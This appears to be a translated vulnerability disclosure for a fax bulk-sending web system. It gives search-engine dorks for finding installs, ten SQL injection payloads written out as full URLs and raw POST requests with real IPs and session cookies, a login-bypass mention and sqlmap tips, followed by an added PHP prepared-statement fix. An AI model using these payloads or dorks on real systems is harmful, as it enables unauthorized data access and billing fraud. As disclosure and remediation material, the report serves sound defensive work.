Disclosure timeline:
2015-04-24: Details reported to the vendor; awaiting vendor response.
2015-04-28: Vendor confirmed; details disclosed to the vendor only.
2015-05-01: Details opened to third-party security partners.
2015-06-22: Details opened to core white hats and domain experts.
2015-07-02: Details opened to regular white hats.
2015-07-12: Details opened to intern white hats.
2015-07-27: Details disclosed to the public.
Sending a fax is billed just like making a phone call. My god... would you still dare to use a system like this?
Cases:
Baidu: intitle:"传真群发系统" and FOFA: title="传真系统" will turn up more cases. The universal-password login bypass works; when I logged in I was stunned: faxes can be sent for free and past fax records can be looked up. None of the 10 injection points requires login.
The 10 injection points follow (地址 in the URLs stands for the target host).

1. Parameter findenddate:
http://地址/user/action/fax_stat.php?current_page=1&findenddate=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&findstartdate=2015-04-19

2. Parameter findstartdate:
http://地址/user/action/fax_stat.php?current_page=1&findenddate=2015-04-23&findstartdate=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/

3. Parameter account:
http://地址/user/bankpay/bankpay_check_account.php?account=-1'%20OR%203*2*1%3d6%20AND%20000355%3d000355%20--%20&action=check

4. Parameter id:
http://地址/user/http/httpnews.php?id=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&type=html

5. Parameter area_code:
http://地址/user/http/httprequest.php?area_code=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&groupid=1&requestcontent=number_section

6. Parameter province_code:
http://地址/user/http/httprequest.php?province_code=hebei'%20AND%203*2*1%3d6%20AND%20'000zzp0'%3d'000zzp0&requestcontent=area

7. Parameter email (POST):
POST /user/action/forgetpwd_action.php HTTP/1.1
Content-Length: 198
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://113.105.225.250:8888/
Cookie: PHPSESSID=g72kr1urlg60uhnij1mekq47n0
Host: 113.105.225.250:8888
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

button=%e6%8f%90%e4%ba%a4&action=getpwd&email=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&username=igwyhlgw

8. Parameter username (POST):
POST /user/action/forgetpwd_action.php HTTP/1.1
Content-Length: 208
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://113.105.225.250:8888/
Cookie: PHPSESSID=g72kr1urlg60uhnij1mekq47n0
Host: 113.105.225.250:8888
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

button=%e6%8f%90%e4%ba%a4&action=getpwd&email=sample%40email.tst&username=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/

9. Parameter account (POST):
POST /user/bankpay/chargeportal_action.php HTTP/1.1
Content-Length: 195
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://113.105.225.250:8888/
Cookie: PHPSESSID=g72kr1urlg60uhnij1mekq47n0
Host: 113.105.225.250:8888
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

account=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&action=charge&channel=bank_ICBC&money=&orderAmount=1

10. Parameter account (POST):
POST /user/action/login_action.php HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://119.145.255.46:8888/index.html
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 119.145.255.46:8888
Content-Length: 80
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: PHPSESSID=cuiafoms2arf10c124vgfg6nr2

action=login&logintype=username&account=asdasd&password=asdasd&userauthcode=muoi

When using sqlmap, the --time-sec option must be added for the injection to work.
The universal-password bypass can be used to log in to the system.
Filter the input.
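The fix suggestion above is just "filter", so here is an added example (not the vendor's code) of what that should mean for the two parameter types seen in this report: strict date validation plus PDO prepared statements for fax_stat.php-style date filters, and a prepared lookup with password_verify() for login_action.php-style authentication, which also removes the universal-password bypass. The $pdo connection and the table and column names (fax_log, users, password_hash) are assumptions.

```php
<?php
// Added example, not the fax system's own code. Assumes a PDO connection $pdo
// and the tables fax_log(user_id, sent_at, pages, cost) and
// users(id, account, password_hash), all invented for illustration.

// Vulnerable pattern the report implies (do NOT use): the raw parameter is
// spliced into SQL text, so a payload such as if(now()=sysdate(),sleep(0),0)
// becomes part of the query:
//   "SELECT ... WHERE sent_at >= '" . $_GET['findstartdate'] . "'"

function validDate(string $s): ?string {
    // Accept only a real YYYY-MM-DD date; the round trip rejects overflowed
    // dates like 2015-02-30 as well as anything containing SQL.
    $d = DateTime::createFromFormat('!Y-m-d', $s);
    return ($d !== false && $d->format('Y-m-d') === $s) ? $s : null;
}

function faxStats(PDO $pdo, int $userId, string $start, string $end): array {
    $start = validDate($start);
    $end   = validDate($end);
    if ($start === null || $end === null) {
        throw new InvalidArgumentException('findstartdate/findenddate must be YYYY-MM-DD');
    }
    // Bound parameters travel as data, never as SQL text, and results are
    // scoped to the logged-in user rather than to whatever the client sends.
    $stmt = $pdo->prepare(
        'SELECT sent_at, pages, cost FROM fax_log
          WHERE user_id = ? AND sent_at BETWEEN ? AND ?'
    );
    $stmt->execute([$userId, $start, $end]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

function login(PDO $pdo, string $account, string $password): ?int {
    // The universal-password bypass depends on the credential text being
    // spliced into the WHERE clause. Look the user up by account only, with
    // a bound parameter, then verify the password against a stored hash.
    $stmt = $pdo->prepare('SELECT id, password_hash FROM users WHERE account = ?');
    $stmt->execute([$account]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($password, $row['password_hash'])) {
        return null; // same response for unknown account and wrong password
    }
    return (int) $row['id'];
}
```

The same two changes (validate to an exact format, then bind) apply to the other injected parameters in the report (id, area_code, province_code, email, username, account), none of which has any legitimate reason to contain SQL syntax.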
Severity: High
Vulnerability Rank: 14
Confirmed: 2015-04-28 09:48
CNVD has confirmed the vulnerability as described; no direct handling channel with the software vendor (or the site operator) has been established yet, and the report is awaiting claim.
None yet.